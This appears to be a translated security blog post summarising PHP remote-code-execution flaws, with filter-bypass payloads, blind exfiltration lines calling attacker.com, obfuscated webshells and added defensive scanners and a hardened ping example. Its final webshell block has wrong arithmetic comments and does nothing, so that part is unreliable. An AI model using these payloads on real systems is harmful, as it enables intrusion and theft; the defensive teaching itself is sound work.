RCE: A Complete Summary
Word count 1643 | 2025-08-07 08:22:02

A Comprehensive Study of RCE Vulnerabilities and Bypass Techniques

I. RCE Basics

RCE (Remote Code Execution) vulnerabilities fall into two main types:

  • Command execution: the application runs operating-system commands built from attacker input
  • Code execution: the application evaluates attacker input as code in a specific programming language

II. PHP Code-Execution Functions

1. High-risk functions

  • eval(): executes a string as PHP code
  • assert(): evaluates an assertion; a string argument is executed as code (PHP 7 and earlier)
  • preg_replace(): executes the replacement as code when the /e modifier is used (PHP 5 only; /e was removed in PHP 7.0)
  • create_function(): builds an anonymous function from a code string (removed in PHP 8.0)
  • array_map(): applies a callback to each element
  • call_user_func() / call_user_func_array(): invoke a callback
  • array_filter(): filters an array through a callback
  • usort() / uasort(): sort an array with a callback comparator

The callback-taking functions become code-execution sinks whenever the callback name comes from user input.

2. Dynamic function invocation

```php
$func = $_GET['func'];
$func();  // calls whatever function the request names
```

III. System Command-Execution Functions

1. PHP command-execution functions

  • system(): runs an external program and prints its output
  • exec(): runs an external program (returns the last line of its output)
  • shell_exec(): runs a command through the shell and returns the full output
  • passthru(): runs an external program and passes its raw output straight through
  • popen() / proc_open(): open a process as a file pointer / with configurable pipes
  • ` ` (backticks): shell-execution operator, equivalent to shell_exec()
  • pcntl_exec(): replaces the current process image with the given program

2. Command execution in other languages

  • Java: Runtime.getRuntime().exec()
  • Python: os.system(), subprocess.Popen()
  • Node.js: child_process.exec(), child_process.spawn()

IV. RCE Exploitation Patterns

1. Direct

```php
// Direct code execution
eval($_GET['code']);

// Command execution
system($_GET['cmd']);
```

2. Indirect

```php
// Via file inclusion
include($_GET['file']);

// Via deserialization
unserialize($_GET['data']);
```
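
The sinks listed in sections II to IV are exactly what a source audit looks for. The Python scanner below is an added example, not code from the original post: it walks a PHP file line by line, records every call to one of the listed functions, the backtick operator, a `$name()` variable call and `preg_replace` with the `/e` modifier, and marks a finding as tainted when a request superglobal reaches it directly or through a variable assigned from one earlier in the file. The sample PHP is constructed from the snippets on this page; the taint tracking is deliberately line-level, so it will miss flows through arrays, function parameters or string interpolation.

```python
import re

# Sinks from sections II to IV: code execution, command execution and indirect (include/unserialize).
CODE_SINKS = {"eval", "assert", "create_function", "array_map", "call_user_func",
              "call_user_func_array", "array_filter", "usort", "uasort"}
CMD_SINKS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open", "pcntl_exec"}
INDIRECT_SINKS = {"include", "include_once", "require", "require_once", "unserialize"}

# Request-controlled sources; a sink fed by one of these (directly or via a variable) is tainted.
SOURCE_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)\b|getallheaders\s*\(|php://input")
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")             # name(
VARCALL_RE = re.compile(r"\$(\w+)\s*\(")                    # $name(  variable function call
VAR_RE = re.compile(r"\$(\w+)")
ASSIGN_RE = re.compile(r"^\s*\$(\w+)\s*\.?=(?!=)\s*(.+)$")  # $x = ... / $x .= ...
BACKTICK_RE = re.compile(r"`[^`]*`")                        # backtick shell operator
PREG_RE = re.compile(r"preg_replace\s*\(\s*(['\"])(.*?)\1")
COMMENT_RE = re.compile(r"(?:^|\s)//.*$")                   # strip trailing // comments


def _modifiers(pattern: str) -> str:
    """Modifier letters of a PCRE pattern literal such as '/(.*)/ie'."""
    delim = pattern[:1]
    closing = {"(": ")", "{": "}", "[": "]", "<": ">"}.get(delim, delim)
    end = pattern.rfind(closing)
    return pattern[end + 1:] if end > 0 else ""


def scan_php(source: str) -> list[dict]:
    """Flag every sink call. 'tainted' means a request source reaches the sink on this
    line, or through a variable that was assigned from a source earlier in the file."""
    findings, tainted_vars = [], set()
    for lineno, raw in enumerate(source.splitlines(), 1):
        line = COMMENT_RE.sub("", raw)
        assign = ASSIGN_RE.match(line)
        rhs = assign.group(2) if assign else line
        tainted = bool(SOURCE_RE.search(rhs)) or any(v in tainted_vars for v in VAR_RE.findall(rhs))
        if assign:  # propagate (or clear) taint for the assigned variable
            (tainted_vars.add if tainted else tainted_vars.discard)(assign.group(1))

        def hit(sink: str, kind: str) -> None:
            findings.append({"line": lineno, "sink": sink, "kind": kind, "tainted": tainted})

        for m in CALL_RE.finditer(line):
            name = m.group(1).lower()
            if name in CODE_SINKS:
                hit(name, "code")
            elif name in CMD_SINKS:
                hit(name, "command")
            elif name in INDIRECT_SINKS:
                hit(name, "indirect")
        for m in VARCALL_RE.finditer(line):
            hit("$" + m.group(1) + "()", "dynamic")
        if BACKTICK_RE.search(line):
            hit("`...`", "command")
        pm = PREG_RE.search(line)
        if pm and "e" in _modifiers(pm.group(2)):
            hit("preg_replace /e", "code")
    return findings


# Constructed sample assembled from the snippets on this page (not a real application).
SAMPLE_PHP = "\n".join([
    "$cmd = \"ping -c 4 \" . $_GET['ip'];",
    "system($cmd);",
    "eval($_GET['code']);",
    "include($_GET['file']);",
    "unserialize($_GET['data']);",
    "$func = $_GET['func'];",
    "$func();",
    "preg_replace('/(.*)/e', $_GET['x'], 'abc');",
    "$out = shell_exec('uptime');  // fixed argument, no request data",
    "echo htmlspecialchars($out);",
])

if __name__ == "__main__":
    for f in scan_php(SAMPLE_PHP):
        flag = "TAINTED" if f["tainted"] else "fixed  "
        print(f"line {f['line']:>2}  {flag}  {f['kind']:<9} {f['sink']}")
```

Untainted findings (line 9 in the sample) are still worth listing in an audit: a fixed command today is a concatenated one after the next refactor.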

V. Bypass Techniques

1. Command-execution bypasses

1.1 Space-filter bypasses

  • `${IFS}`: the shell's internal field separator
  • `$IFS$9`: `$9` is an empty positional parameter, so it terminates the variable name without adding anything
  • `<` or `>`: redirection operators
  • `%09` (tab)
  • `{cmd,arg}`: brace expansion

1.2 Keyword-filter bypasses

  • Wildcards: `/???/??t /???/p??swd`
  • Variable concatenation:
    a=c;b=at;c=flag;$a$b $c

  • Encoding:
    • Base64: echo "Y2F0IC9ldGMvcGFzc3dk"|base64 -d|bash
    • Hex: echo "636174202f6574632f706173737764"|xxd -r -p|bash
  • Backslash: `c\at /etc/passwd`
  • Quotes: `c'a't /etc/passwd`
  • Empty variable: `c${x}at /etc/passwd`

1.3 Blind (no-output) execution

  • DNS exfiltration: `curl http://$(whoami).attacker.com`
  • HTTP request: `wget http://attacker.com/$(cat /etc/passwd)`
  • Time-based check: `sleep 5`
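
The primitives in 1.1 to 1.3 are also what a defender can match on. The Python scanner below is an added example, not code from the original post: it URL-decodes a request parameter (repeatedly, because `%09` and double encoding only show up after decoding), checks the decoded value against one heuristic signature per trick listed above, and returns the indicator names so the caller can score or alert. The sample parameter values are constructed here from the page's own payloads; the signature names and the threshold are this example's own choices and will need tuning against real traffic.

```python
import re
from urllib.parse import unquote_plus

# Heuristic signatures for the tricks listed in 1.1 to 1.3 (names chosen for this example).
INDICATORS = {
    "separator":       re.compile(r"[;|&\n]"),                         # command chaining
    "ifs_space":       re.compile(r"\$\{IFS\}|\$IFS\b"),               # ${IFS}, $IFS$9
    "tab_space":       re.compile(r"\t"),                              # %09 after decoding
    "brace_expansion": re.compile(r"\{[^{}\s]+,[^{}\s]*\}"),           # {cmd,arg}
    "redirect_space":  re.compile(r"\w<[^\s<>]"),                      # cat</etc/passwd
    "wildcard_path":   re.compile(r"/\?{2,}"),                         # /???/??t
    "split_keyword":   re.compile(r"[A-Za-z](?:\\|'|\"|\$\{\w*\})[A-Za-z]"),  # c\at, c'a't, c${x}at
    "var_concat":      re.compile(r"\w=\w+;.*\$\w+\$\w+"),             # a=c;b=at;$a$b
    "decode_to_shell": re.compile(r"(?:base64\s+-d|xxd\s+-r\s+-p)\s*\|\s*(?:ba|z|da)?sh\b"),
    "substitution":    re.compile(r"\$\([^)]*\)|`[^`]+`"),             # $(whoami), `whoami`
    "blind_channel":   re.compile(r"\b(?:curl|wget|nslookup|dig|sleep)\b"),
}


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the value stops changing (bounded), so %2509-style double encoding is caught."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze(raw: str) -> dict:
    """Return the decoded value and the indicator names it triggers, in INDICATORS order."""
    decoded = decode_fully(raw)
    matches = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"raw": raw, "decoded": decoded, "matches": matches, "score": len(matches)}


# Constructed sample parameter values: one benign, the rest built from the tricks above.
SAMPLES = [
    "127.0.0.1",
    "127.0.0.1;cat${IFS}/etc/passwd",
    "127.0.0.1;cat%09/etc/passwd",
    "echo%20%22Y2F0IC9ldGMvcGFzc3dk%22%7Cbase64%20-d%7Cbash",
    "{cat,/etc/passwd}",
    "/???/??t%20/???/p??swd",
]


def triage(samples=SAMPLES, threshold: int = 1) -> list[tuple[str, list[str]]]:
    """Return (raw, matches) for every sample whose score reaches the threshold."""
    return [(r["raw"], r["matches"]) for r in map(analyze, samples) if r["score"] >= threshold]


if __name__ == "__main__":
    for raw, matches in triage():
        print(f"{raw!r:60} -> {matches}")
```

Two design points matter more than the individual regexes: decode before matching (a filter that looks at the raw query string never sees the tab behind `%09`), and treat the result as a score rather than a verdict, since `split_keyword` alone will also fire on ordinary apostrophes in free text.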

2. Code-execution bypasses

2.1 PHP code-execution bypasses

  • Short tags: `<?=` and `<?`
  • Dynamic function name: `$func = "sys"."tem"; $func("whoami");`
  • String concatenation:
    $a = 'syste';
    $b = 'm';
    ($a.$b)('whoami');

  • Callback:
    array_map('system', array('whoami'));

  • Reflection:
    $func = new ReflectionFunction('system');
    $func->invoke('whoami');


2.2 Parameterless RCE

  • getallheaders() + end():
    system(end(getallheaders()));

  • get_defined_vars():
    $a = system(current(get_defined_vars()));&b=whoami

  • session_id():
    session_start();
    system(hex2bin(session_id()));


3. Alphanumeric-free webshells

  • PHP XOR (the `%XX` sequences are the URL-encoded bytes of the payload; the server decodes them before PHP evaluates the expressions):
    ```php
    $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // assert
    $__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // _POST
    $___=$$__;
    $_($___[_]); // assert($_POST[_])
    ```
  • PHP bitwise NOT (inverting high bytes yields ASCII):
    ```php
    $__=~('%9E'^'%FF');                   // one non-printable byte, 0x9E
    $___=~('%8C%86%8C%8B%9A%92');         // system
    $____=$__.$___;
    $_____=~('%99%93%9E%98%D1%8F%97%8F'); // flag.php
    $_____($$____[_]);
    ```


## VI. Defensive Measures

1. Input validation and filtering
 - Allow-list validation
 - Filter shell metacharacters (`|`, `&`, `;`, `` ` ``, `>`, `<`)

2. Use the safe helpers
 - Use `escapeshellarg()` and `escapeshellcmd()`
 - Avoid dynamic code execution

3. Disable dangerous functions
 - Disable `system` and similar functions through `disable_functions` in php.ini (`eval` is a language construct rather than a function, so `disable_functions` cannot turn it off)

4. Least privilege
 - Run the web server as a low-privilege user

5. Use safer alternatives
 - Call a specific API instead of shelling out
 - Use parameterized queries instead of string concatenation

## VII. Worked Cases

### 1. Command-injection bypass
```php
// Original vulnerable code
$cmd = "ping -c 4 ".$_GET['ip'];
system($cmd);

// Attack payload (value of the ip parameter)
ip=127.0.0.1;cat${IFS}/etc/passwd
```
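
The fix for this case is the combination of items 1, 2 and 5 from section VI: allow-list the value, never hand a concatenated string to a shell, and quote if a shell is truly unavoidable. The block below is an added example, not code from the original post; it transliterates the vulnerable PHP into Python (the page lists `os.system()` and `subprocess` as the Python equivalents) and places the hardened form beside it. Function names are this example's own.

```python
import ipaddress
import os
import shlex
import subprocess


def ping_vulnerable(ip: str) -> int:
    """The PHP case above, transliterated: the shell parses whatever follows the IP."""
    # '127.0.0.1;cat${IFS}/etc/passwd' becomes two commands; never call this with request data.
    return os.system("ping -c 4 " + ip)


def validate_ip(value: str) -> str:
    """Allow-list check: only a syntactically valid IPv4/IPv6 literal passes (normalised form)."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        raise ValueError(f"rejected ip parameter: {value!r}") from None


def is_valid_ip_param(value: str) -> bool:
    """Boolean wrapper for callers that want to log-and-continue instead of raising."""
    try:
        validate_ip(value)
        return True
    except ValueError:
        return False


def build_ping_argv(ip: str) -> list[str]:
    """Argument vector for the hardened call: with no shell involved, metacharacters are inert."""
    return ["ping", "-c", "4", validate_ip(ip)]


def ping_hardened(ip: str) -> subprocess.CompletedProcess:
    """shell=False (the default) passes argv straight to the kernel; nothing re-parses it."""
    return subprocess.run(build_ping_argv(ip), capture_output=True, text=True, timeout=30)


def quote_for_shell(arg: str) -> str:
    """When a shell string is unavoidable, quote each argument; shlex.quote is the escapeshellarg() analogue."""
    return shlex.quote(arg)


if __name__ == "__main__":
    print(build_ping_argv("127.0.0.1"))
    print(quote_for_shell("127.0.0.1;cat${IFS}/etc/passwd"))
    print(is_valid_ip_param("127.0.0.1;cat${IFS}/etc/passwd"))  # False: rejected before any process starts
```

Quoting is the fallback, not the primary control: `quote_for_shell` turns the payload into a single harmless argument, but `validate_ip` rejects it outright, which is the better outcome. In PHP the same two layers are `filter_var($ip, FILTER_VALIDATE_IP)` for the allow-list and `escapeshellarg()` for the quoting.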

### 2. Alphanumeric-free webshell

```php
<?php
$_=('>'>'<')+('>'>'<');          // true + true = 2
$__=$_+$_;                       // 4
$____='';                        // built only from digits produced by the arithmetic below
$____.=$__+$__+$_;               // "10"
$____.=$__+$_+$_+$_;             // "10"
$____.=$__+$_+$_+$_+$_+$_+$_;    // "16"
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;         // "14"
$____.=$__;                      // "4"
$____.=$__+$__+$__+$_+$_;        // "16"
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;                  // "8"
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
```